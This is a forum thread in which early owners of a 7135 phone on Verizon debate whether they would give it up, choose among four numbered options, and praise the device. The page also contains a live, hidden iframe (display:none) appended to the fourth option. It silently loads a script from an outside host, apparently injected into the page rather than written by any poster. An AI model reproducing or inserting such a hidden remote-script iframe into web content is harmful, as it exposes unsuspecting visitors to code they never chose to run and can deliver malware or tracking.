+ Reply to Thread

Early 7135 Adopters -- Would You Give It Up?

I considered a poll but ... Nah.

This is to those, like me, who have activated this thing on Verizon. If Verizon told you that they would no longer allow you to have service on their networks using your 7135, what would you do?

1. Agree - You would put your phone up for sale on eBay or hope you can activate it later and return to whatever phone you were using. Business is business and they do have their rights. All Verizon phones suck but they are the best carrier on the planet. Their service is more important to you.

2. Protest - You'd comply but scream bloody murder and start (or join) a formal protest updating the media. No need to sell your 7135 since you are relentless and know Verizon will cave in.

3. Switch Immediately - try to get on Alltel or some other network to keep using your phone.

4. Wait and Switch - Wait until Sprint comes around and obtain the phone from them. Put your 7135 up for sale or donate it to charity.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Number 2 for me. Unless they show that the phone was actually breaking FCC regs or otherwise negativly impacting their network, I would fight it tooth and nail.

Same here!

OK here is my answer:

I'd start with #2 but would consider #4 (even though I loathe the coverage of Sprint) if they made it impossible to use the phone on the Verizon network.

It is 1997 for me all over again -- when I got my first Palmpilot. This phone is everything I'd hoped it would be and there is no way I'd give it up. I'm advising my friends to wait for the carriers because if they run into problems, I don't want to hear it. However, I am sooooo glad I didn't wait one more day to get this phone.

The form factor is right and features are great. All we need are developers out there adding support improved access to the Address book and other built-ins. The device is fine -- as is -- but there is room for software enhancements.